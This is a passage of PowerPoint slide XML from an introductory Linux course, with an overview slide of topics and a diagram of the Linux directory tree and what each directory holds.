          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most Privileged</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770974" y="5437625"/>
            <a:ext cx="2258476" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device Drivers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770974" y="4866316"/>
            <a:ext cx="2258476" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device Drivers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2205560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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3144278637"/>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Linux File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973281" y="3271260"/>
            <a:ext cx="1387781" cy="1315754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4089985" y="1502115"/>
            <a:ext cx="1501647" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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etc</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27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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/media</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30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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mnt</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31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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sbin</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33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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srv</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34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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tmp</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35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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usr</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36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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var</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37" name="Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1656360"/>
            <a:ext cx="1728928" cy="2272777"/>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42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1964851"/>
            <a:ext cx="1728926" cy="1964286"/>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45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2273340"/>
            <a:ext cx="1728926" cy="1655797"/>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52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2581830"/>
            <a:ext cx="1728925" cy="1347307"/>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54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2890319"/>
            <a:ext cx="1728926" cy="1038818"/>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56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3198810"/>
            <a:ext cx="1728925" cy="730327"/>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58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728925" cy="2354571"/>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60" name="Straight Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="2046081"/>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62" name="Straight Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1737592"/>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64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="1429101"/>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66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728929" cy="195142"/>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68" name="Straight Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3815790"/>
            <a:ext cx="1728923" cy="113347"/>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70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3507300"/>
            <a:ext cx="1728925" cy="421837"/>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72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="812122"/>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74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1120612"/>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76" name="Straight Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="503632"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5591626" y="1502115"/>
            <a:ext cx="5108211" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Rectangle 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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Static files of Boot Loader</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95" name="Rectangle 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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Device files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96" name="Rectangle 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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Host-specific system configuration</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97" name="Rectangle 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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User home directories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98" name="Rectangle 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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Shared libraries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99" name="Rectangle 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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0" name="Rectangle 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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Mount point for file systems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1" name="Rectangle 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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Add-on application software packages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2" name="Rectangle 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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System binaries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3" name="Rectangle 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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Data for services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4" name="Rectangle 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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Temp files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5" name="Rectangle 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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User utilities and applications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6" name="Rectangle 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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Variable files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7" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Home directory for root user</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8" name="Rectangle 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
